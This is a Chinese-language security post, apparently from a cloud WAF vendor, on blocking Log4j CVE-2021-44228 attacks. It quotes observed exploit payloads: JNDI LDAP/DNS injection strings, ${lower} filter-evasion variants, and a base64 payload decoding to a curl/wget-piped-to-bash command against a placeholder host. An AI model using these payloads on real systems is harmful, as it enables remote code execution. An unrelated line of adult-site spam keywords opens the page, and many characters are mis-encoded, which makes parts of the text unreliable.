亚洲精品无码鲁网中文电影,无码专区日韩亚洲精品,丁香花视频资源在线观看,亚洲综合av永久无码精品一区二区

您好,歡迎進入銳速云官網(wǎng)!

售后熱線:4006-5050-10 QQ客服:2852917158 登錄 注冊

銳速超級WAF輕松2步攔截apache log4j2漏洞攻擊
編輯作者:   發(fā)布時間:2021-12-14

關(guān)于如何緩解 Log4j 中的 CVE-2021-44228、漏洞是如何產(chǎn)生的以及為我們的客戶提供的緩解措施,具體有關(guān)漏洞修補,網(wǎng)上好多教程,自己搜一下。

  在撰寫本文時,由于漏洞的嚴重性,我們也正在為客戶推出保護措施,現(xiàn)在有很多關(guān)于掃描和嘗試利用漏洞的數(shù)據(jù),看到被阻止的攻擊最大峰值緩慢增加,而且掃描一整天都是連續(xù)的,我們看到這種情況在繼續(xù)下去。


圖片1.png


經(jīng)過我們安全工程師大量數(shù)據(jù)分析總結(jié)出攻擊特征與方法:


控制了該服務(wù)器,并記錄了 Internet 屬性可被利用,這并沒有演示太多。

第二個最受歡迎的請求包含以下內(nèi)容:

${jndi:ldap://x.x.x.x/#Touch


請求的 User-Agent 字段中:

Mozilla/5.0 ${jndi:ldap://x.x.x.x:5566/ExploitD}/ua


443 的未加密請求,他們試圖使用 http://

${jndi:http://x.x.x.x/callback/https-port-443-and-http-callback-scheme}


有人試圖冒充 Googlebot 并包含一些額外的信息:

Googlebot/2.1(+http://www.google.com/bot.html)${jndi:ldap://x.x.x.x:80/Log4jRCE}


該方案的一個變體是在漏洞利用負載中包含被攻擊網(wǎng)站的名稱:

${jndi:ldap://www.app.example.com.gu.c1me2000ssggnaro4eyyb.example.com/www.app.example.com}


一些參與者沒有使用 LDAP,而是使用了 DNS。但是,LDAP 是迄今為止最常用的協(xié)議:

${jndi:dns://app.example.com/ext}


一個非常有趣的掃描涉及使用 Java 和標準 Linux 命令行工具。有效載荷如下所示:

${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN1cmwgLXMgeC54LngueDo1ODc0L3kueS55Lnk6NDQsdfdsfdsfIC1PLSB4LngueC54OjU4NzQveS55LnkueTo0NDMpfGJhc2g=}


base64 編碼部分解碼為 curl 并通過管道傳輸?shù)?bash 中:

(curl -s x.x.x.x:5874/y.y.y.y:443||wget -q -O- x.x.x.x:5874/y.y.y.y:443)|bash


請注意, curl/wget 的輸出不是必需的,因此這只是點擊服務(wù)器以向參與者表明該漏洞有效。


最后,我們看到了一些積極的嘗試,例如${jndi:ldap通過使用 Log4j 的其他功能來逃避對字符串的簡單阻塞。例如,一種常見的規(guī)避技術(shù)似乎是使用以下${lower}特征(小寫字符):

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x



銳速超級WAF解決方案:


進入用戶中心---安全與加速---域名管理—點擊域名–點擊《訪問控制》

找到《自定義規(guī)則配置》

增加一條UA規(guī)則


2.png


增加一條URL規(guī)則


3.png


到此基本可以防完上面所遇到的惡意數(shù)據(jù)針對log4j2的請求


如果還想進一步更加完美雙重保障,可以開啟超級WAF能防護功能


4.png


遇到攻擊,攔截

5.png


版權(quán)所有:Copyright @ 2016-2022 深圳市銳速云計算有限公司 增值電信業(yè)務(wù)經(jīng)營許可證
粵B1-20171508 備案系統(tǒng) 粵ICP備16119720號 粵公網(wǎng)安備 44030902000612號